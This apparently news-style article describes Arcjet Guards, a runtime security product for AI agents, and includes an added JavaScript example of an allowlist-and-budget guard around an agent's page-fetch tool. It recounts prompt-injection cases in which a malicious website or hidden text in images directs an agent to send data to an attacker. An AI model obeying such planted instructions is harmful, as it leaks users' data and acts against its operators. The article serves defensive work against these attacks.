Securing the Invisible: How Arcjet Guards Protects AI Agents Beyond HTTP Boundaries

Published 2026-05-11 09:30:25 · Software Tools

Introduction

As artificial intelligence agents increasingly take over critical application tasks—such as reading files, loading web pages, and processing queue messages—the security tools that once provided robust defenses are losing their effectiveness. Traditional security measures built around HTTP boundaries, including web application firewalls (WAFs), proxies, and middleware, can no longer see the threats that now travel through internal code paths. Arcjet, a San Francisco-based runtime security company, aims to close this gap with its new offering: Guards.

[Image: Securing the Invisible: How Arcjet Guards Protects AI Agents Beyond HTTP Boundaries. Source: thenewstack.io]

This article explores the evolving attack surface in agentic systems and explains how Arcjet Guards enforces security where it actually matters—inside the application logic itself.

The Gap: Why Traditional Security Fails for Agentic Systems

Traditional application security assumes a clear request boundary. An HTTP request arrives at a front door, passes through middleware and inspection, then reaches the application code. That model worked well for conventional web applications. But agentic systems operate very differently.

Where Input Enters Without HTTP

As Arcjet CEO David Mytton explained in a blog post, “An agent tool handler receives untrusted input as a function argument, not a request body. A queue consumer pulls a message off a broker, never touching a router. A multi-agent pipeline passes state from one step to the next through shared memory or a workflow engine.” None of these interactions cross a network boundary that a proxy can detect.

The result is a massive blind spot. WAFs and AI gateways sitting at the network edge cannot inspect function arguments, queue messages, or inter-agent state transfers. Security teams lose visibility into the very points where attacks are most likely to strike.

Concrete Consequences: Real Incidents and Deepening Blind Spots

The problem isn’t theoretical. Mytton cited a real incident where an AI agent fetched a maliciously crafted website. The site’s content instructed the agent to send data to an external attacker. The WAF protecting the chat interface upstream never saw the malicious action because the attack took place inside the agent’s internal processing—not in the HTTP layer.

Prompt Injection and Beyond

Text instructions hidden inside images that the agent loads represent another dangerous vector. Attackers can craft such images to inject prompts that redirect the agent’s behavior. Mytton noted in a briefing with The New Stack, “You’ve got all your permissions set up correctly on the chat interface, but by prompt injecting agents right behind the scenes, you can get it to take actions that it wasn’t expecting.”

The Context Problem

Visibility isn’t the only issue. Even if a proxy could see a request, it lacks the context needed to assess risk. Mytton wrote, “A proxy can see the request. It can’t see the identity, the session, the business logic, or the budget.” Inside an agentic system, the challenge is even steeper—a proxy cannot see a tool call at all, because a tool call is not an HTTP request.

What Guards Does: Runtime Enforcement Inside the Code

Arcjet Guards rethinks where security policies are applied. Instead of inspecting traffic at the perimeter, Guards integrates into the application through Arcjet's SDK. Developers define security rules in the same codebase as the feature itself, so protection ships with the code and is reviewed in the same pull request as the business logic.

Enforcement at the Point of Untrusted Input

The enforcement point moves to wherever untrusted input arrives—whether that’s a function argument, a queue message, or a workflow step. Guards runs inside the application, where it has full access to identity, session, business logic, and budget information. This context-rich approach allows for far more precise and effective security decisions.

Integration with Existing Development Workflows

Because Guards uses Arcjet’s existing SDK, developers can add security rules as code comments or configuration alongside their feature code. No separate security tooling or proxy configuration is required. As Mytton stated, “Security has to live where the code lives. For agentic systems, that means inside the tool calls an agent makes.”
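The following is an added illustration of the enforcement model the article describes, not code from Arcjet or its SDK. It wraps a hypothetical agent tool handler (`fetch_page`) in a guard that runs on every invocation, including calls that originate from the model's tool-use loop rather than an HTTP route. The decision uses the context the article says a proxy lacks: the caller's identity and role, the session, and a per-session call budget. The policy values, tool name, host allowlist and sample calls are all constructed for the example.

```javascript
// Added example (not Arcjet's SDK): an in-process guard around an agent tool handler.
// The policy lives beside the handler, so it is reviewed in the same pull request.

// Hypothetical policy for a "fetch_page" tool. Hosts, roles and limits are constructed.
const fetchPolicy = {
  allowedHosts: new Set(["docs.example.com", "api.example.com"]),
  allowedRoles: new Set(["analyst", "admin"]),
  maxCallsPerSession: 3,
  maxUrlLength: 2048,
};

// Per-session counters stand in for the "budget" context the article mentions.
const sessionBudgets = new Map();

// Decide whether one tool invocation may proceed. Returns { allow, reason }.
// The url argument is untrusted: it may have been lifted from a page the agent read.
function guardFetch(policy, context, args) {
  if (!context || !context.sessionId || !context.userId) {
    return { allow: false, reason: "missing identity or session context" };
  }
  if (!policy.allowedRoles.has(context.role)) {
    return { allow: false, reason: `role ${context.role} may not call fetch_page` };
  }
  if (typeof args.url !== "string" || args.url.length > policy.maxUrlLength) {
    return { allow: false, reason: "url argument missing or too long" };
  }
  let target;
  try {
    target = new URL(args.url); // WHATWG URL parser, global in Node.js
  } catch {
    return { allow: false, reason: "url argument is not a valid URL" };
  }
  if (target.protocol !== "https:") {
    return { allow: false, reason: `scheme ${target.protocol} not permitted` };
  }
  if (target.username || target.password) {
    return { allow: false, reason: "credentials embedded in url" };
  }
  if (!policy.allowedHosts.has(target.hostname)) {
    return { allow: false, reason: `host ${target.hostname} not on allowlist` };
  }
  // Budget is checked last so denied calls do not consume it.
  const used = sessionBudgets.get(context.sessionId) || 0;
  if (used >= policy.maxCallsPerSession) {
    return { allow: false, reason: "session fetch budget exhausted" };
  }
  sessionBudgets.set(context.sessionId, used + 1);
  return { allow: true, reason: "ok" };
}

// Wrap a handler so the guard runs on every call, whatever path delivered the input.
function guarded(policy, guard, handler) {
  return async function guardedHandler(context, args) {
    const decision = guard(policy, context, args);
    if (!decision.allow) {
      // Denials are the detection signal: record who, which session, and why.
      console.warn(`[guard] denied fetch_page for ${context && context.userId} ` +
                   `(${context && context.sessionId}): ${decision.reason}`);
      return { ok: false, error: decision.reason };
    }
    return handler(args);
  };
}

// Stub handler standing in for the real fetch. Constructed for the example.
async function fetchPageHandler(args) {
  return { ok: true, body: `<fetched ${args.url}>` };
}

const fetchPage = guarded(fetchPolicy, guardFetch, fetchPageHandler);

// Three model-driven tool calls: one legitimate, one to an off-allowlist host of the
// kind an injected page might name, one downgraded to plain http.
async function demo() {
  const ctx = { userId: "u-42", sessionId: "s-demo", role: "analyst" };
  return [
    await fetchPage(ctx, { url: "https://docs.example.com/guide" }),
    await fetchPage(ctx, { url: "https://attacker.invalid/collect?d=secret" }),
    await fetchPage(ctx, { url: "http://docs.example.com/" }),
  ];
}
```

The guard returns a structured decision rather than throwing, so the tool handler can hand a clear error back to the model and the denial is logged with identity and session attached. A queue consumer or workflow step gets the same treatment by wrapping its message handler with `guarded` and a policy written for that message shape.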

Conclusion: A New Model for Agent Security

Arcjet Guards represents a necessary evolution in application security. As AI agents become more autonomous and handle more sensitive operations, the old perimeter-based approach is no longer sufficient. By embedding enforcement directly into the code paths that agents use, Guards closes the visibility and context gaps that traditional WAFs leave open. For development teams building agentic applications—whether for file processing, web scraping, or multi-step workflows—Guards offers a way to secure the invisible attack surface without slowing down innovation.